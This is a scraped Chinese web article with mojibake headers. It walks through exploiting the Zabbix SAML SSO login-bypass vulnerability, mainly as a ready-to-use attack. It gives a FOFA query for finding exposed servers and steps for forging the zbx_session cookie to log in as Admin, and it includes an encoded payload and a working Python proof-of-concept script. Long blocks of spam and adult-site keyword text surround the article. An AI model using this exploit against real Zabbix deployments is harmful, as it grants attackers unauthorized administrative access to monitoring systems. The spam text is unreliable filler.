日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁(yè)技術(shù)文章
文章詳情頁(yè)

Zabbix SAML SSO 登錄繞過(guò)漏洞的操作流程

瀏覽:586日期:2023-04-06 15:09:27
目錄
  • 一、簡(jiǎn)介
  • 二、FOFA語(yǔ)法
  • 三、復(fù)現(xiàn)流程

一、簡(jiǎn)介

zabbix是一個(gè)基于WEB界面的提供分布式系統(tǒng)監(jiān)視以及網(wǎng)絡(luò)監(jiān)視功能的企業(yè)級(jí)的開源解決方案。zabbix能監(jiān)視各種網(wǎng)絡(luò)參數(shù),保證服務(wù)器系統(tǒng)的安全運(yùn)營(yíng);并提供靈活的通知機(jī)制以讓系統(tǒng)管理員快速定位/解決存在的各種問(wèn)題。

zabbix server可以通過(guò)SNMP,zabbix agent,ping,端口監(jiān)視等方法提供對(duì)遠(yuǎn)程服務(wù)器/網(wǎng)絡(luò)狀態(tài)的監(jiān)視,數(shù)據(jù)收集等功能,它可以運(yùn)行在Linux,Solaris,HP-UX,AIX,F(xiàn)ree BSD,Open BSD,OS X等平臺(tái)上。

該漏洞源于在啟用 saml SSO 身份驗(yàn)證(非默認(rèn))的情況下,未身份驗(yàn)證的攻擊者可以修改會(huì)話數(shù)據(jù),成功繞過(guò)前臺(tái)進(jìn)入后臺(tái),因?yàn)榇鎯?chǔ)在會(huì)話中的用戶登錄未經(jīng)過(guò)驗(yàn)證。

漏洞的限制條件:需要啟用 SAML 身份驗(yàn)證,并且攻擊者必須知道 Zabbix 用戶的用戶名。

二、FOFA語(yǔ)法

app=“ZABBIX-監(jiān)控系統(tǒng)” && body=“SAML”

三、復(fù)現(xiàn)流程

1、通過(guò)fofa語(yǔ)法搜索zabbix資產(chǎn)訪問(wèn)首頁(yè)獲取set-cookie中zbx_session參數(shù)的值

2、通過(guò)Url解碼和Base64解碼獲得zbx_session參數(shù)Json格式數(shù)據(jù)

{"sessionid":"67f71355eb96121f384ea0571290faca","sign":"Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

3、通過(guò)在Json中添加saml_data和username_attribute參數(shù)后重新Base64編碼和Url編碼構(gòu)造Payload

{"saml_data":{"username_attribute":"Admin"},"sessionid":"67f71355eb96121f384ea0571290faca","sign":"Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

4、把構(gòu)造好的payload進(jìn)行base64編碼和url編碼

%65%79%4a%7a%59%57%31%73%58%32%52%68%64%47%45%69%4f%6e%73%69%64%58%4e%6c%63%6d%35%68%62%57%56%66%59%58%52%30%63%6d%6c%69%64%58%52%6c%49%6a%6f%69%51%57%52%74%61%57%34%69%66%53%77%69%63%32%56%7a%63%32%6c%76%62%6d%6c%6b%49%6a%6f%69%4e%6a%64%6d%4e%7a%45%7a%4e%54%56%6c%59%6a%6b%32%4d%54%49%78%5a%6a%4d%34%4e%47%56%68%4d%44%55%33%4d%54%49%35%4d%47%5a%68%59%32%45%69%4c%43%4a%7a%61%57%64%75%49%6a%6f%69%56%58%6c%78%4d%6b%4a%59%55%57%5a%6c%4e%55%6c%31%5a%7a%52%56%51%6e%42%31%59%33%64%78%4d%31%42%59%51%57%31%57%61%44%42%6a%64%48%42%53%4e%48%42%32%52%57%5a%36%5a%31%77%76%54%31%64%6c%4e%31%52%4c%61%47%31%42%55%57%52%78%65%58%55%31%61%56%56%74%64%46%64%36%55%56%49%72%4d%47%30%7a%4d%32%56%52%51%6b%68%75%61%7a%46%57%56%69%74%4a%54%7a%42%70%59%30%46%52%50%54%30%69%66%51%3d%3d

5、請(qǐng)求index_sso.php,在http請(qǐng)求頭中構(gòu)造payload,將zbx_session的值替換為url編碼后的payload

6、成功登錄后臺(tái)

可利用poc直接獲取構(gòu)造后的payload

poc:

import requestsimport reimport urllib.parseimport base64import jsonimport sys def exp(target, username):	resp = requests.get(url=target, verify=False)	cookie = resp.headers.get("Set-Cookie")	zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)	url_decode_data = urllib.parse.unquote(zbx_session[0], encoding="utf-8")	base64_decode_data = base64.b64decode(url_decode_data)	decode_to_str = str(base64_decode_data, encoding="utf-8")	to_json = json.loads(decode_to_str)	tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])	payloadJson = json.dumps(tmp_ojb)	print("decode_payload:", payloadJson)	payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))	print("zbx_signed_session:", payload)if __name__ == "__main__":	if len(sys.argv) != 3:		print("argv error")		exit(0)	target = sys.argv[1]	username = sys.argv[2]	exp(target, username)

到此這篇關(guān)于Zabbix SAML SSO 登錄繞過(guò)漏洞的文章就介紹到這了,更多相關(guān)Zabbix 登錄繞過(guò)漏洞內(nèi)容請(qǐng)搜索以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持!

標(biāo)簽: Zabbix
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
亚洲精品自拍| 精品伊人久久| 久久久久国产精品一区二区| 精品久久97| 欧美韩日一区| 日韩和的一区二在线| 久久久影院免费| 91精品高清| 国产一级一区二区| 亚洲一区成人| 亚洲精品欧洲| 国产日产精品一区二区三区四区的观看方式| 欧美日韩亚洲一区| 美女视频黄久久| 肉色欧美久久久久久久免费看| 亚洲不卡系列| 伊人精品在线| 亚洲精品婷婷| 国产精品亚洲综合久久| 国产不卡一区| 不卡中文一二三区| 中文字幕亚洲精品乱码| 国产毛片久久久| 超级白嫩亚洲国产第一| 久久精品成人| 蜜桃久久av一区| 国产精品久久久久久妇女| 91一区二区| 国产亚洲毛片在线| 日本va欧美va瓶| 粉嫩av一区二区三区四区五区| 成人在线网站| 亚洲天堂av资源在线观看| 国产欧美一区二区色老头| 成人国产精品| 午夜亚洲福利在线老司机| 欧美日韩91| 欧美亚洲日本精品| 亚洲欧美高清| 精品国产一区二| 欧美日韩精品一本二本三本 | 99日韩精品| 国产乱码精品一区二区三区四区 | 亚洲视频二区| 高清久久精品| 蜜桃视频第一区免费观看| 国产精品久久国产愉拍| 亚洲一级高清| 国产精品第十页| 91精品福利| 欧美日韩一区自拍| 亚洲无线一线二线三线区别av| 91亚洲无吗| 国产中文一区| 久久国产尿小便嘘嘘| 极品日韩av| 免费在线亚洲欧美| 午夜亚洲精品| 日本不良网站在线观看| 亚洲精品九九| 99精品一区| 欧美激情久久久久久久久久久| 国产一区清纯| 欧美aa在线视频| 中文不卡在线| 高清一区二区| 日本欧美一区二区| 欧美亚洲福利| 快she精品国产999| 欧美gv在线| 久久福利在线| 亚洲无线观看| 久久国产电影| 久久精品国产99国产| 亚洲a成人v| 激情婷婷亚洲| 国产精品毛片aⅴ一区二区三区| 一区二区自拍| 国产成人精品亚洲日本在线观看| 天堂俺去俺来也www久久婷婷| 国产福利片在线观看| 日本一不卡视频| 日韩视频中文| 亚洲午夜精品久久久久久app| 国产精品白丝久久av网站| 免费黄网站欧美| 成人av动漫在线观看| 国产一区国产二区国产三区| 91精品在线免费视频| 久久亚洲风情| 黄色成人精品网站| 婷婷成人在线| 樱桃视频成人在线观看| 精品美女在线视频| 国产精品久久久久久妇女| 国产农村妇女精品一区二区| 蜜桃精品在线| 精品久久久久中文字幕小说| 欧美午夜三级| 日韩1区2区3区| 视频一区在线视频| 99精品99| 99热精品在线| 9久re热视频在线精品| 激情六月综合| 91精品久久久久久久久久不卡| 麻豆网站免费在线观看| 国产一区二区三区四区大秀| 久久亚洲资源中文字| 久久99久久人婷婷精品综合| 欧美日韩一区二区国产 | 美女尤物久久精品| 亚洲欧美日韩高清在线| 蜜桃视频欧美| 欧美1区免费| 久久免费黄色| 久久国产小视频| 久久久五月天| 色婷婷精品视频| 久久久久久久久99精品大| 久久久久一区| 欧美~级网站不卡| 亚洲欧美日韩高清在线| 亚洲伊人av| 国产成人77亚洲精品www| 精品国产乱码久久久| 成人国产精选| 亚洲成人精品| 999精品在线| 99视频精品免费观看| 欧美综合二区| 久久先锋影音| 日韩av成人高清| 麻豆久久一区二区| 大香伊人久久精品一区二区| 欧美黄色网页| 日韩午夜在线| 中文字幕日本一区| 国产精品综合| 久久精品国产999大香线蕉| 9999国产精品| 激情视频一区二区三区| 视频一区二区三区在线| 日韩欧美另类中文字幕| 国产精品欧美三级在线观看| 国产色播av在线| 精品一区亚洲| 蜜桃91丨九色丨蝌蚪91桃色| 国产乱人伦精品一区| 中文字幕在线视频网站| 午夜国产欧美理论在线播放| 日本一区福利在线| 精品国产18久久久久久二百| 久久国产影院| 男人天堂欧美日韩| 国产精品一区二区精品视频观看| 三上亚洲一区二区| 一本一本久久| 国产欧美一区二区三区国产幕精品| 久久精品国产免费| 久久国产亚洲| 日韩精品一区二区三区中文| 免费一区二区三区在线视频| 日产精品一区| 综合干狼人综合首页| 欧美激情99| 免费av一区| 欧美日韩中文| 欧美精品日日操| 男人操女人的视频在线观看欧美| 青草国产精品| 蜜桃av.网站在线观看| 亚洲精品麻豆| 精品香蕉视频| 影院欧美亚洲| 你懂的亚洲视频| 99亚洲视频| 精品视频在线观看网站| 国产精品视区| 成人污污视频| 中文字幕免费一区二区| 麻豆视频在线看| 日韩在线观看中文字幕| 国产色播av在线| 美国三级日本三级久久99| 精品视频99| 丝袜美腿亚洲色图| 国产aⅴ精品一区二区三区久久| 黄色亚洲免费| 欧美aa在线视频| 久久亚洲不卡| 日韩精品永久网址| 91精品福利观看| 合欧美一区二区三区| 精品国产亚洲一区二区三区| 久久亚洲图片| 三级精品视频| 久久不卡国产精品一区二区| 日韩一区二区免费看| 精品国产一区二区三区av片|